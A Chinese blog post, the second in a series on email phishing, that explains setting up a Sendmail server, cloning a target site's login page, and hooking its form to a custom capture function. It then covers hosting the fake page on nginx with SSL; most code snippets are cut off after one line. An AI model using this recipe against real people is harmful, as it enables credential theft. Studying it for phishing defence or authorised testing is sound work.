关于邮件钓鱼的哪些事(二)
郑重声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,如果您不同意请关闭该页面!任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!
前言
首先需要编写一个钓鱼一键化平台,然后进入我们的正题

搭建邮件服务器
首先卸载Postfix
如果没有Postfix就跳过
sudo systemctl stop postfix |
安装Sendmail
sudo apt install sendmail |
配置Sendmail服务器
sudo sendmailconfig |
接收输入电子邮件
编辑/etc/mail/sendmail.mc
DAEMON_OPTIONS(`Family=inet, Name=MTA-v4, Port=smtp, Addr=127.0.0.1')dnl |
然后将域名添加到/etc/mail/local-host-names
文件中
ascotbe.com |
现在使用 m4宏处理器来编译Sendmail配置文件。m4是基于流的。
sudo m4 /etc/mail/sendmail.mc > /etc/mail/sendmail.cf |
重新启动Sendmail服务
sudo systemctl restart sendmail |
日志文件
里面有一些报错,比方说为什么发送失败等等
/var/log/mail.log |
多服务方案
最好是sendmail和medusa搭建在同一台服务器上
而不是使用多服务方案
如果你的Medusa在一个服务器,而邮件服务器又在一个地方,需要修改邮件服务中的配置,打开/etc/mail/access
文件
#添加全局配置 |
配置完需要重启服务器
配置域名解析
编写钓鱼页面
一般把目标网站copy到本地,然后把页面中的/test/login.html
进行补全http://127.0.0.1/test/login.html
,具体看网页去,然后修改action标签
<form action="javascript:login()"> |
一般是这样的,我们只需要把函数进行修改或者自定义,替换成下面函数
不同的网页不同的改法,我这边只是做个样例
var login2 = function () { |
整站拉取
可以使用kali或者Ubuntu进行下载,然后进行网站克隆,一般不太会用到,做个记录
sudo apt install httrack |
钓鱼网站搭建
安装nginx
apt-get install nginx |
查看安装版本
nginx -v |
启动nginx
service nginx start |
然后输入服务器IP就能看到下面效果
配置钓鱼页面
进入nginx默认的网页目录
cd /var/www/html |
你会看到index.html、index.htm、index.nginx-debian.html三个文件中的任意一个(建议全部删了)然后把你改好的钓鱼页面放到上面
修改nginx的配置文件
sudo vim /etc/nginx/sites-enabled/default |
接着重启服务
sudo systemctl restart nginx |
可以看到已经成功的页面
配置SSL证书,还是对/etc/nginx/sites-enabled/default
文件进行修改
server { |
最好重启Nginx即可看到结果